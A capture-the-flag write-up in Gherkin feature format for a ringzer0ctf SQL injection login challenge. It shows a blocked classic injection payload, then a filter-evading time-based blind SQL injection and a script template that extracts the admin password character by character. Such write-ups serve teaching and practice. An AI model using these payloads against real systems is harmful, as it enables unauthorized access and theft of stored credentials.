## Version 2.0
## language: en

Feature: login-portal-4-ringerzeroctf
  Site:
    https://ringzer0ctf.com/challenges/6
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Login as admin

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | NixOS           | 19.09.2260          |
  | Chromium        | 78.0.3904.87        |

  Machine information:
    Given the challenge URL
    """
    https://ringzer0ctf.com/challenges/6
    """
    When I open the url with Chrome
    Then I see a login form
  Scenario: Fail:Sql-injection
    Given the form
    And knowing that answer is correct when It returns:
    """
    FLAG-*********************
    """
    When I try with a well known payload
    """
    username=admin' or '1'='1&password=a
    """
    Then I get "Illegal characters detected."
    And I don't solve the challenge

   Scenario: Success:Sqli-timed-exploitation
    Given that I inspected the functionality
    And I see that they respond with "Illegal characters detected."
    Then I figure out that they filter some characters
    When I try to substitute "or/and" with "||/&&"
    And use a time based payload
    """
    a' || if(ord(mid((select password from users limit 0,1),1,1))>128,sleep(0),
    sleep(3)) && 'a'='a
    """
    Then it responds with a delay when the statement is false
    Then I created the following payload to get the password
    """
    payload = "a' || if(ord(mid((select password " + \
                    "from users limit 0,1)," + \
                    str(COUNT) +",1))=" + str(i) + \
                    ",sleep(0),sleep(3)) && 'a'='a"
    """
    Then I created a python script to find it using ORD and MID [exploit.py]
    And I get the admin password and the flag
    Then I solve the challenge
